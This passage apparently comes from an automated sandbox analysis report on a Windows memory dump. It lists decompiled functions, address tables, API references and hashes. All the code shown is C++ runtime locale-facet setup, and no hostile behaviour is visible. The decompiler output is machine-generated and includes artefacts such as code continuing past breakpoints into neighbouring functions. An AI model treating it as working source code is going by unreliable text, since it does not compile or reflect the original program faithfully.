							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E1C6FD3(__eflags, _t143);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e286e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6e1dba8a
0x6e1dba8a
0x6e1dba91
0x6e1dba9b
0x6e1dbaa0
0x6e1dbaab
0x6e1dbaaf
0x6e1dbab2
0x6e1dbab7
0x6e1dbabb
0x6e1dbac0
0x6e1dbac4
0x6e1dbb09
0x6e1dbb0c
0x6e1dbb18
0x6e1dbac6
0x6e1dbac8
0x6e1dbace
0x6e1dbad4
0x6e1dbadc
0x6e1dbadf
0x6e1dbb1c
0x6e1dbb2a
0x6e1dbb2f
0x6e1dbb37
0x6e1dbb41
0x6e1dbb46
0x6e1dbb51
0x6e1dbb55
0x6e1dbb58
0x6e1dbb5d
0x6e1dbb66
0x6e1dbb68
0x6e1dbb6a
0x6e1dbbaf
0x6e1dbbb2
0x6e1dbbbe
0x6e1dbb6c
0x6e1dbb6c
0x6e1dbb6e
0x6e1dbb74
0x6e1dbb7a
0x6e1dbb82
0x6e1dbb85
0x6e1dbbc2
0x6e1dbbd0
0x6e1dbbd5
0x6e1dbbdd
0x6e1dbbe7
0x6e1dbbec
0x6e1dbbf7
0x6e1dbbfb
0x6e1dbbfe
0x6e1dbc03
0x6e1dbc0c
0x6e1dbc0e
0x6e1dbc10
0x6e1dbc55
0x6e1dbc58
0x6e1dbc64
0x6e1dbc12
0x6e1dbc12
0x6e1dbc14
0x6e1dbc1a
0x6e1dbc20
0x6e1dbc28
0x6e1dbc2b
0x6e1dbc65
0x6e1dbc68
0x6e1dbc76
0x6e1dbc7b
0x6e1dbc83
0x6e1dbc88
0x6e1dbc8a
0x6e1dbc90
0x6e1dbc93
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbca0
0x6e1dbca6
0x6e1dbca9
0x6e1dbcb5
0x6e1dbc2d
0x6e1dbc2d
0x6e1dbc30
0x6e1dbc34
0x6e1dbc38
0x6e1dbc45
0x6e1dbc4d
0x6e1dbc4f
0x00000000
0x6e1dbc4f
0x6e1dbc16
0x6e1dbc16
0x00000000
0x6e1dbc16
0x6e1dbc14
0x6e1dbb87
0x6e1dbb87
0x6e1dbb8a
0x6e1dbb8e
0x6e1dbb92
0x6e1dbb9f
0x6e1dbba7
0x6e1dbba9
0x00000000
0x6e1dbba9
0x6e1dbb70
0x6e1dbb70
0x00000000
0x6e1dbb70
0x6e1dbb6e
0x6e1dbae1
0x6e1dbae1
0x6e1dbae4
0x6e1dbae8
0x6e1dbaec
0x6e1dbaf9
0x6e1dbb01
0x6e1dbb03
0x00000000
0x6e1dbb03
0x6e1dbaca
0x6e1dbaca
0x00000000
0x6e1dbaca
0x6e1dbac8

APIs

__EH_prolog3.LIBCMT ref: 6E1DBA91
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DBA9B
int.LIBCPMT ref: 6E1DBAB2

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1DBAD5
std::_Facet_Register.LIBCPMT ref: 6E1DBAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBB2A

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 3f1cd47c6b94290e772520a4b29d801c4eb0de0c8c780c841d37ef3e8c201c5d
Instruction ID: 871425d830d8ca758c1b149f09e5771e32464a45e1ac3515f6095b4040267452
Opcode Fuzzy Hash: 3f1cd47c6b94290e772520a4b29d801c4eb0de0c8c780c841d37ef3e8c201c5d
Instruction Fuzzy Hash: C31159B6910529CBCF01DBE8C844EFEB37ABF55714F180908E010AB290DF749989E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA2F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1CA2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t52 =  *0x6e286cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6E1A161C(0x6e286cc0);
				_t40 = _a8;
				_t22 = E6E1A171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CAB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6E1A1438(_t44);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6e22ba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t50);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6e286cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}

0x6e1ca2f8
0x6e1ca302
0x6e1ca307
0x6e1ca312
0x6e1ca316
0x6e1ca319
0x6e1ca31e
0x6e1ca322
0x6e1ca327
0x6e1ca32b
0x6e1ca370
0x6e1ca373
0x6e1ca37f
0x6e1ca32d
0x6e1ca32f
0x6e1ca335
0x6e1ca33b
0x6e1ca343
0x6e1ca346
0x6e1ca380
0x6e1ca383
0x6e1ca391
0x6e1ca396
0x6e1ca39a
0x6e1ca39e
0x6e1ca3a3
0x6e1ca3a6
0x6e1ca3ad
0x6e1ca348
0x6e1ca348
0x6e1ca34b
0x6e1ca34f
0x6e1ca353
0x6e1ca360
0x6e1ca368
0x6e1ca36a
0x00000000
0x6e1ca36a
0x6e1ca331
0x6e1ca331
0x00000000
0x6e1ca331
0x6e1ca32f

APIs

__EH_prolog3.LIBCMT ref: 6E1CA2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA302
int.LIBCPMT ref: 6E1CA319

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

numpunct.LIBCPMT ref: 6E1CA33C
std::_Facet_Register.LIBCPMT ref: 6E1CA353
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA373
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA391

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 456846d47ead52b5371961121d9dd9f98fb6f257750a7053a9ed8d713976cf31
Instruction ID: 735cae5e3a60efc266a16dcbe2ab7a3f6c9004252164c8788c6eb04a0768748b
Opcode Fuzzy Hash: 456846d47ead52b5371961121d9dd9f98fb6f257750a7053a9ed8d713976cf31
Instruction Fuzzy Hash: F611597591052C8FCF02DBE4C858AFEB77AAF65B14F140808E111E7290DF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA059, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CA060
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA06A
int.LIBCPMT ref: 6E1CA081

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

codecvt.LIBCPMT ref: 6E1CA0A4
std::_Facet_Register.LIBCPMT ref: 6E1CA0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA0F9

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: 6c0233284617a88496a789714a59c5e73494fe97c8675e313c3bf580882d9c68
Instruction ID: 9f3d7afc96278260b153884b24c126f4897c3fe65938d2a81a9c8dafa1618b13
Opcode Fuzzy Hash: 6c0233284617a88496a789714a59c5e73494fe97c8675e313c3bf580882d9c68
Instruction Fuzzy Hash: B9112C7591052DCBCF02DBE4C858AFDB77ABF64B14F144808D511EB290DF789988E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF183, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CF18A
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF194
int.LIBCPMT ref: 6E1CF1AB

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

messages.LIBCPMT ref: 6E1CF1CE
std::_Facet_Register.LIBCPMT ref: 6E1CF1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF205
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF223

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: b907541997d5f26931a2e23dc5df2962eac46702d50761f9d70ed5d485b8e475
Instruction ID: 17cbc553947f46873d4d38657ca77728b4933f696d168cab1bf453b347714afc
Opcode Fuzzy Hash: b907541997d5f26931a2e23dc5df2962eac46702d50761f9d70ed5d485b8e475
Instruction Fuzzy Hash: 1F11E7799105198BCB01DBD4C854AFEB77AAFA4B14F244809E530AB290DF78D984E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF9F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t242 - 0x14, 0);
				_t231 =  *0x6e286de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1A161C(0x6e286d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E1C66BA(_t242 - 0x14);
					return E6E1E0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E1D1471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t242 - 0x20);
							E6E1E3D74(_t242 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t225, _t231, 0x14);
							E6E1C6653(_t242 - 0x14, 0);
							_t232 =  *0x6e286dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1A161C(0x6e286da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E1C66BA(_t242 - 0x14);
								return E6E1E0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E1D14EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t242 - 0x20);
										E6E1E3D74(_t242 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t172, _t226, _t232, 0x14);
										E6E1C6653(_t242 - 0x14, 0);
										_t233 =  *0x6e286dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1A161C(0x6e286d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E1C66BA(_t242 - 0x14);
											return E6E1E0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E1D1558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t242 - 0x20);
													E6E1E3D74(_t242 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t172, _t227, _t233, 0x14);
													E6E1C6653(_t242 - 0x14, 0);
													_t234 =  *0x6e286e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1A161C(0x6e286dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E1C66BA(_t242 - 0x14);
														return E6E1E0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E1D15C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t242 - 0x20);
																E6E1E3D74(_t242 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t172, _t228, _t234, 0x14);
																E6E1C6653(_t242 - 0x14, 0);
																_t235 =  *0x6e286dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1A161C(0x6e286d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E1C66BA(_t242 - 0x14);
																	return E6E1E0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E1D162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1A1438(_t207);
																			E6E1E3D74(_t242 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e22851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e22c0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E1D542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E1E0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E1C6FD3(__eflags, _t229);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e286dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E1C6FD3(__eflags, _t228);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e286e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E1C6FD3(__eflags, _t227);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e286dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E1C6FD3(__eflags, _t226);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e286dfc = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E1C6FD3(__eflags, _t225);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e286de0 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6e1cf9f1
0x6e1cf9f1
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa22
0x6e1cfa27
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f

APIs

__EH_prolog3.LIBCMT ref: 6E1CF9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFA02
int.LIBCPMT ref: 6E1CFA19

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

numpunct.LIBCPMT ref: 6E1CFA3C
std::_Facet_Register.LIBCPMT ref: 6E1CFA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFA91

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 643dc0711f7aff9a26f820de7d09e7c5509c972a22330bf08c98a56e90f214f5
Instruction ID: 8edfe73c22ec15f3f6cf4f2005e38ae4c26afc13b590589c1f0be27bf3072d77
Opcode Fuzzy Hash: 643dc0711f7aff9a26f820de7d09e7c5509c972a22330bf08c98a56e90f214f5
Instruction Fuzzy Hash: D31136759105298BCF01DBE4C854AFEB37AAF68B04F244809E121E7290DF78D989E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB9E4, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t198 - 0x14, 0);
				_t189 =  *0x6e286e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1A161C(0x6e286e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E1C66BA(_t198 - 0x14);
					return E6E1E0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E1DC120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t198 - 0x20);
							E6E1E3D74(_t198 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t184, _t189, 0x14);
							E6E1C6653(_t198 - 0x14, 0);
							_t190 =  *0x6e286e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1A161C(0x6e286e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E1C66BA(_t198 - 0x14);
								return E6E1E0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E1DC1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t198 - 0x20);
										E6E1E3D74(_t198 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t141, _t185, _t190, 0x14);
										E6E1C6653(_t198 - 0x14, 0);
										_t191 =  *0x6e286e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1A161C(0x6e286e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1A171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E1C66BA(_t198 - 0x14);
											return E6E1E0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E1DC229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t198 - 0x20);
													E6E1E3D74(_t198 - 0x20, 0x6e283504);
